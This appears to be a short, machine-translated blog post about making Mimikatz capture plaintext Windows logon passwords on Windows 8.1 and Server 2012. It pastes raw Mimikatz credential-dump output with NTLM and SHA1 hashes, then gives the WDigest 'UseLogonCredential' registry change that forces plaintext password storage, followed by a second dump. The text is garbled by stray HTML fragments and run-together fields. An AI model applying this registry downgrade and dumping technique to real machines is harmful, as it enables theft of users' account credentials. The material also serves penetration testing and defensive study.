Mickey | 2015-05-11 11:52
The default configuration is to not catch the plaintext password, artifact Mimikatz display password is null
Authentication Id : 0 ; 121279 (00000000:0001d9bf)Session : Interactive From 1User Name :MickeyDomain :WIN-B054laoh5fcLogon Server :WIN-B054laoh5fcLogon Time : 2014/2/7 16:13:37Sid:S-1-5-21st-3697557613-2315859964-140861748-1001msv: [00000003] Primary * Username :Mickey* Domain :WIN-B054laoh5fc*Ntlm: 31d6cfe0d16ae931b73c59d7e0c089c0 *SHA1:da39a3ee5e6b4b0d3255bfef95601890afd80709[00010000] Credentialkeys *Ntlm: 31d6cfe0d16ae931b73c59d7e0c089c0 *SHA1:da39a3ee5e6b4b0d3255bfef95601890afd80709 tspkg:Wdigest: * Username :Mickey* Domain :WIN-B054laoh5fc* Password : (null) : * username< Span class= "PLN" > : Mickey *domain : Win- B054LAOH5FC * password: (null) : KO CredMan :
The "uselogoncredential" that needs to be hklm:\system\currentcontrolset\control\securityproviders\wdigest is set to 1, and the type is DWORD 32. Then the next time the user logs in, they can record the plaintext password.
Authentication Id : 0 ; 2506062 (00000000:00263d4e)Session : Interactive From 2User Name :MickeyDomain :WIN-B054laoh5fcLogon Server :WIN-B054laoh5fcLogon Time : 2015/5/11 11:47:35Sid:S-1-5-21st-3697557613-2315859964-140861748-1001msv: [00010000] Credentialkeys *Ntlm:ad12521316a18d2172f20db07674c278*SHA1: 85b6b322a966fe19f758ee15fd7516c23c33cb7c [00000003] Primary * Username :Mickey* Domain :WIN-B054laoh5fc*Ntlm:ad12521316a18d2172f20db07674c278* SHA1 : 85b6b322a966fe19f758ee15fd7516c23c33cb7c tspkg : wdigest Span class= "pun" >: * username : Mickey * Domain : Win-* password : [email protected].
Reference Link: http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
Windows 2012 catch PlainText password method